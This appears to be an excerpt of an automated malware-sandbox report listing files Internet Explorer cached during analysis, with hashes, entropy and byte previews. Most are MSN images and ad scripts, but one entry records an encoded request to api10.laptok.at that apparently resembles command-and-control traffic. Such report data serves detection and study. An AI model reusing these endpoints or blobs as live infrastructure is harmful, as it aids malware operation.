IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHhCC.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=907&y=1399
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....?N...R.7J...S.{...,..S{5.P.\....}jX.=_I.....6.j....Y.PO.x...Z.{...o#;..jj:L..gE$.}..~U...2G..N...).6.......k......!..zzW.x.M....6.,.C#o.kg.v..v.n..s3O.}>.+..G...2..Y.s..2sV..>.L.Ho.x%d....:r?..Gq..Z.b.}Z.)YR7........{.[K./.5==.2H...V\|.....'.........2..^..h..<.c..-w\]/...>P2.... ..$ya.....;is.....k.<q......tO.k:...[..h......N..TX,......K.T.{.I.....O..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHj30[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	downloaded
Size (bytes):	2609
Entropy (8bit):	7.81053494692097
Encrypted:	false
SSDEEP:	48:BGpuERAHNnsP5Xd76zOtcumL/TJsf2QA/QFGPlG+DTswUviMmFf5gwACsRCo:BGAE2NsP5A7uue2zQguaM4ACno
MD5:	646C60016F1ACB2FE5B474330185277F
SHA1:	7FC10CC5F3C272B2620CFD027A4CE1DC62BF45A4
SHA-256:	6C5DD98966B6A6451B01FCB65F5CE82C4D8EA23278AB412DCC227246AAF5F5E1
SHA-512:	34D01C1F87071E374E8D4A08884B7334D07CA982DBDDF39BEC31D826149155CC798D61230AF06333C4B6D7E465AAB56DF8FDF5F0DA2EDEA4DC401D1A324F4BE5
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHj30.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Q%.y.I9f..F.._o.&.%.L..&..1.......T..P......wFJ`rwq...c....%.e......W..;g=....t2.V.)m&.J.F.]....\....g...<..nK'...{.c.s.m..,.E...p.$`q.c.....Ex...H.....Qg ..bP.^... ..........M...^].I.....&...A....@.n.q...Ukfx..L...T..z{.V.H...bY.P.(.[..Q.c...j......<....?L.5h.adDl.19Q..N@.]DR.........}9)+.&f.%y\|...;...AW..Y.....{r..?.;$....I-.q....x...#.M./ g..>.....s@.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHwGP[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	downloaded
Size (bytes):	1426
Entropy (8bit):	7.61140107642463
Encrypted:	false
SSDEEP:	24:BI/XAo0XxDuLHeOWXG4OZ7DAJuLHenX34h7dfIPEodGWrgoKp5pzU/p:BGpuERAWfIPEqGvdpHzUB
MD5:	A87FCE7B79D63F958EE110D7A83BC2C4
SHA1:	4DB455BE36157AAE6EE10D29E8CC575DB9340B25
SHA-256:	6F9B477B6AD2F85263A67579879AAC8324F77F53C1BF754C314302E5354C21F7
SHA-512:	387316FC437D3FE27D03EBE5E822102FD02859BBBAC581D4A0CC8DB11D66C60876D0A568569637E1C6CFA45F3A7DE4C45A26005E71BCDC4E4B2A8560D5110954
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHwGP.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..0..Q..F.z.9..z.o&..jp....>sR...H2.4Qf0hl,A'AI.K2`Tq.iu+....x.V.k..N...U..o1-......?R.ob....s....#.........R.S.S..;Wj.##..Oa..L.)qE!..IK..;...zS...@..i...Hdrp.B.%V.9.,.({.$..._....-m^i>.......Y...wt.=K.]...wQ.U$W.qu...+...x.7.....G....G.w.2M>.3H..-.zg.i.=..Mj.Y...K.........n.z..yL..V..NE1lm<.2............R..*..c..h...&I...... ..s.3..\....H.........P.i.Uj..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHxqE[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	downloaded
Size (bytes):	13828
Entropy (8bit):	7.923487582568081
Encrypted:	false
SSDEEP:	192:BbTcilaMgGyzerzB5I0K9QeioHWYb0Xrk5kMJtBvtOnb52qPnvLamiAOmmQTV5:ZraJzerzBHK9QgD0XrV2Bwnb5XvmxoV5
MD5:	DBA78C48EA6D6CC9879CE06BAE974351
SHA1:	BD67B235ED1AE24191E91521B67B324415584590
SHA-256:	6F38A166D9DB13D34D1A24025A1A881FC1E4350A4268654D6F984796215CED12
SHA-512:	484DFC7EB1DC1DE2A4D83038C2C91F3DC04EAF53865EE7FD84FF2BA1A3DF798581D2161DA1D38504E38D5C9D5E0AC7896B7443B71CAAB2E31A53C085909C62AD
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHxqE.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg&x=650&y=434
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....1....8..=}...=..{t..N.r...>...T.,....f........[.....\S....<.w....[.V..sUn-...q.zT.. ..\|.Tt\|....`.:T..z...............o+Sd.>.D...\|..6.....M.H$F....tTef..j..7.........H.G]JO..?......H.QI..y.^i.?.~u..6Z...W....%...j&...[..!...Msh?...n.{I....8. .......S.N.=/...+E...............+T........{?..K.....?.o-........7.........UrH?.......iF..................Q{....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dI7Wd[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	8703
Entropy (8bit):	7.854263285778846
Encrypted:	false
SSDEEP:	192:BYOQHoxNLt8fEBe8qHmb4ZMph0NkQdWDhZVzH8kjl0:eOIWLtP08qGQMph0W9D9zH8kK
MD5:	1DC4E26F46296E53A12B4BD9D8C917F0
SHA1:	7DBEF06ACBB84FDA194B52CD63B6811E1B2925EE
SHA-256:	19BFCD1F9D7371CFA501157AF679D8F434093CF77AD0B868C68127331B199A61
SHA-512:	0CA22252B9AC6C6BC891E1F7702B0B8282E854F7BFFD8902282905A4C6716ADCCB8DE7AC3A08B7FE94C224B80CE9B6FF747E2B7A9D1BB7568EBE102AB633A91F
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dI7Wd.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(...E...+......:.\.nxr.C$.......JN....@:.;.\|..5B}xA'..L.rs.).Z.t9..k.H.).V.CS........~.=:...QP..S.MjAv......=M.SZ...:....m.q.k..;..:..cb.9.I."....Z.\...u.Ya.Q..Rfd..q\..4s...y....=k..2....a...'.r..ec.F+[_..zv.....Oj..u...)&...Q.u....1K.1@..)qF(.....P.QK.1@....b...J)qF(..)qF(.(..b...Z(...P(.R.H.idX.e.......'Nk...8........8..x.*...Oo.......6.J..>.k..A^;....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBUE92F[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	708
Entropy (8bit):	7.5635226749074205
Encrypted:	false
SSDEEP:	12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
MD5:	770E05618413895818A5CE7582D88CBA
SHA1:	EF83CE65E53166056B644FFC13AF981B64C71617
SHA-256:	EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
SHA-512:	B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...%...%.IR$....YIDAT8OM..LA...~..."".q...X........+"q@...A...&H..H...D.6..p.X".......z.d.f......rg.?.....v7.....\.{eE..LB.rq.v.J.:tv...w.....g../.ou.]7........B..{..\|.S.......^....y......c.T.L...(.dA..9.}.....5w.N......>z.<..:.wq.-......T..w.8-.>P...Ke....!7L......I...?.mq.t....?..'.(....'j.......L<)L%........^..<..=M...rR.A4..gh...iX@co..I2....`9}...E.O.i?..j5.\|$.m..-5....Z.bl...E......'MX[.M.....s...e..7..u<L.k.@c......k..zzV....O..........e.,.5.+%.,,........!.....y;..d.mK..v.J.C..0G:w...O.N...........J....\|....b:L=...f:@6T[...F..t......x.....F.w..3....@.>.......!..bF.V..?u.b&q.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBnYSFZ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	560
Entropy (8bit):	7.425950711006173
Encrypted:	false
SSDEEP:	12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
MD5:	CA188779452FF7790C6D312829EEE284
SHA1:	076DF7DE6D49A434BBCB5D88B88468255A739F53
SHA-256:	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
SHA-512:	2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......\|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....\|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..\|>..n4...2.57........f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\CFI[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	339392
Entropy (8bit):	5.999967656351339
Encrypted:	false
SSDEEP:	6144:cDJl443S9YbS47Fk3Zsv12tXBQWgy01CGFSpjYC5osGAEcJMizvDupzStPX56:cB35u8u6vMFgy0cWUGlMv65oXM
MD5:	415DBB7F17A00913790F8E99ADBB9D93
SHA1:	C7D1A1B88A46A1E65B109257BFFFB5259900AF17
SHA-256:	3A7B725B6B273BFCFDBEC5A06868562AD848034EFBA247BE5739858768FC3B0A
SHA-512:	39C6EB2B71D0D68E0AEAC7DF2CCBDA743633A94895D90DC2569D866F1490A33200BEB29AC31573F2814E78487FF6FC50D492AC049213C8542ACE6BF23F24D048
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI
Preview:	6jOtPWjpJsKgG9IhgDi2XnSCJeSPxONX1nV8WY+GCWFWyqgjjf6aBHZ4Gm39WG35NlAjlSFMwsnGPoXAWLoM/VLRnXdPawnt6pIAayjW023ZgrADWj9Fjr/hEsQCUe4YN7RczMhFfFBSJE/eeaHpbpQOy3XXJLCECMM3JawVyKI5iDJIFdt8LR0d0hT19sg73Ioo/OjZ0sudP5iixOsSUCP++ITfM5DX+ewXXNSgm3azZl1EqLWpD9YZWm1PgJLqtij73+/eCtHQdmU+FFqUDQ3Xnpks7WjfKicoK3vhxYzfuwHE3AUCMVgzwFEzknjCe9uIblPLxqxWMU6JLDpeSTbcyxbKggkrp+O89ZEF+bScp5n9Jc1fsIkM9Ncw15Qt0YTxV/MgV22XDxC1hTWXMQuNHwUzeqTfFvh26+BNxM/PwN5yOJhezaNZpQp7q9tDSNskdDTftyq4K8ofKgCZv15zm+l5u7/Mcd5nxwUPW5WsXa7ib9QPplhF063avjRaAFWVpamPBkQP1N1SoIbNNFsgzHlH79gPaBwu3X1dEAe3blRumLGYr8OAsEwvbOVxJvLh6q753BMvZjXGdTk+9dFyubDa1jpLDtD176vNa++TwgurI3dCIbwwGkxT+S7BtkCz2UsVl8/oxv+pyVqTuFWJNBVsjmMBTH+o6ixzyxY4kCoQ14J3W6MW8QSctnAS2US5UlzBdCiE7HQNno7026e8F26RpsiAmcjtEeqQ38jAnTbDfOm/u+sBYDbOeAwpBjLG/DryeM3Qi9w7O6LujG5iaCPrVUxgHhW5/6oMR8sdtLTYSw3ERvJPdZq/pt+pOqSVnTDfixNvt8OAYhiEKwuSyGf5nQHyRruX1Tvy+NIGP/+PTpz8rcqR3pPUYDDDZA7zg4T1I/Y2vuZ1crSAZAJy6aXwJD0XSAvEzXw3OBHfnIBt14DTppquKuqVJanzB0revx3N8H8GUUIncQil4aNk4MPGk5P4qJOiPkQT

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	26067
Entropy (8bit):	5.668270399886674
Encrypted:	false
SSDEEP:	384:m8RpcDPs9pc58u81/esxF4wyMNH87hpJ+bN2ICY5o7kS7i0EeJkXYGiyFpproBIw:m1tWZ9hdb7jzWP3I8X
MD5:	0304E614E92FEDCDFEC9C3345DD15969
SHA1:	0635FDABF6151F5FF75E5210146AED96710E9214
SHA-256:	26862A95B23853E609F7017B1A21C08E2234B837BFE2B734F83DFE12E75A87A9
SHA-512:	B0C95A8D4F23FE5F9A0A02EEEB0560EC8989CBC99D23B9A9ABAA392643F3A90E3F679F1C17023B89AEFE90C5B47F0B5C64A677B74A04FFC2240E1CFD2E32EB27
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=c99b6d8737ec42509dd00479fdb8ff89&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1613433453534
Preview:	.<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_20e52d46d3e9b32505f7939505245e91_192e8a4f-a416-423a-bc24-733823072981-tuct7248ff2_1613433458_1613433458_CIi3jgYQr4c_GPHcv9m1i_i9aCABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ"},"tbsessionid":"v2_20e52d46d3e9b32505f7939505245e91_192e8a4f-a416-423a-bc24-733823072981-tuct7248ff2_1613433458_1613433458_CIi3jgYQr4c_GPHcv9m1i_i9aCABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ","pageViewId":"c99b6d8737ec42509dd00479fdb8ff89","RequestLevelBeaconUrls":[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"taboola","e":true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">.<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38175
Entropy (8bit):	5.067708708588622
Encrypted:	false
SSDEEP:	768:P1avn4u3hPPfW94hRhnSN1pJYXf9wOBEZn3SQN3GFl295oPul1jBHulLsyvi:dQn4uRPWmhRhnopJYXf9wOBEZn3SQN3R
MD5:	68F6208169C47FB06F3B3E1DDD41EA87
SHA1:	A3797BE720A2A858219AED43DAC7F5656997816F
SHA-256:	423667CE9924EBF53C894010F1C44095BA09F5205E3F8D2376B84FDF46A2BFA5
SHA-512:	31FB11B1E6C5B33858DDC227D92EC63F1920955D4C63CA79A6AF1780530E2BEB77521B2FE023F040165932BACE2E43357E1224E89FADFA1FA08202410FACBE58
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613433454724624095&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1613433454724624095","s":{"_mNL2":{"size":"306x271","viComp":"1613432825684901417","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886781032","l2ac":"","sethcsd":"set!N7\|983"},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1613433454724624095\")) \|\| (parent._mNDetails[\"locHash\"] && paren

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_3e4db03aeb27326fa409d0201601c66d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	10928
Entropy (8bit):	7.956030588292682
Encrypted:	false
SSDEEP:	192:L6zlqp97Pzn186KnXg5acKZ4KdQiTD/DetwAIM/6c+8MefqXlS5UiG:OJeZzJ+y4QiTD/DeH/63GiV6+
MD5:	0C1A16B7BE63A652982673F6557DC826
SHA1:	57270462703461486071ABBA8C09E0A4D763AC81
SHA-256:	708CCCB9C1594400AC6F3AD998B498A9EEDCC50A8A6194EA633C9DC6D656B139
SHA-512:	2D0937F8E4547A895BAFACF1644CC7F465F5D081BF4B600ABDC8C7A275E69B335A0A4C5452DFFBE1CB1A8F6C62FFEB2D1CFF672755764F3B3274A0140E47842F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F3e4db03aeb27326fa409d0201601c66d.jpg
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C.......)..)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......7.....................................................................................oCk..9\..`. v..../D.Hs5 .4..Vu=@..1..g.A.....Y.....HV5cN....jy..k..........b.@..8...K........N..&...\.N:..WT.0..I..q8z.4...&fP...5\|..p.51J...).....(>.Q.\...e....(.L..k...v.Q..5...F.jL..A.....z.@u.....[+....AhG......c.......VR.&a.x\..d......}...:......4.2.A..3N;B.Z1...\.T....8..^....v.]...R.o.;.1....}..7VE....2.....V.&;P...9.R]>....UY.zn6...Ej........(Md....JBMX........T...>.%.^.1.af.w..Y.M.ft........a....Rc..9..jj.N~....Nl..BW;f.......O...g-..PY.f...6...@..k..\|.u....E.N.>.m\.1..@...C.(-r..D.".C..f....y.*Y..K.S=-3.. @.......:.....xsb.Z.;.^.3{..<.<...Y\...........4.. .BZ.d.....}W..yG..~..`o.w.\.$.. @.....VcQ...A@.Z....Kx.;9#k.5..G.1...... @.`.>Z..OK.i#..'..O....i...w........... .8.....A.....?...f...,Zg.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_82baf35d7cc74b9e51be7f602b931379[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	12904
Entropy (8bit):	7.95877351198921
Encrypted:	false
SSDEEP:	384:ZvHfB/MZ5+OMwGd/TkwmKAWmmrIDLbzn5XUtyEDrcEI:Zv/aZ5B0tIw/AWmmrc5Ae
MD5:	C3A7E31F4BDBD53F6A8E8D751FD72C7A
SHA1:	99AB94231A1CE3FC3916980A43F981D4DFF5F0F2
SHA-256:	38652F1FF5E3A63BCE841F8AEC3B4905B47EFB6B60A036424CB659797FD5600D
SHA-512:	1C4026C733A1F725F2BD72FBB0F093DEF6A818E212CDE8D20490074A73AF619DAED58AE0ACCE47063AC4920AB9F56456D648058D55A9C65381191C671A3821E7
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F82baf35d7cc74b9e51be7f602b931379.jpg
Preview:	......JFIF..........................................................+".."+2(2<66<LHLdd.............................................+".."+2(2<66<LHLdd.......7...."..........4.................................................................-.n....5:.r%.X;....}...bC3....r.#....p..........f....#.....[...s...d.{=,..6...IT.:.v&V,P.....1M.P...6)q....j....u..B.g..#.u.....]..".#......y...c.B.Kh.[}.... S.t1z\|..U]S.....R..1.....lyf.)Y3*.o,..n....7..$j{yy%.b ...+.sq.F..hh...,.W....:I.....+...\\|.uZ....&.f..!.v..,0i..J...Lk0...+U..T.@..y....KfS.6.!4..\|3H...V^.v.X.6.a4.!...9y.i.......z,..Fr[.4....v..z+.IM.k.d1...._...N..........e.S.-.l.%...U.6]D..":.......A...h..L..j.E...?.f.6F...KB.......2..Ar.xT..6..a.e,E..V~...f.e...../...q.cBE.5.......a.R..;.u..dXC.#..S1.^+.[..r....6t.:U..N9.\|.B...=...4..q...X..........W......\..tL.&7U....>}.D.._w....]b.W...PH.y..r.4..H...e!..NZ...0./k...:............V.I.o....\|........E...z-B.....y..q.b....Q..u. .H.........EC.`=H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12588
Entropy (8bit):	5.376121346695897
Encrypted:	false
SSDEEP:	192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
MD5:	AF6480CC2AD894E536028F3FDB3633D7
SHA1:	EA42290413E2E9E0B2647284C4BC03742C9F9048
SHA-256:	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
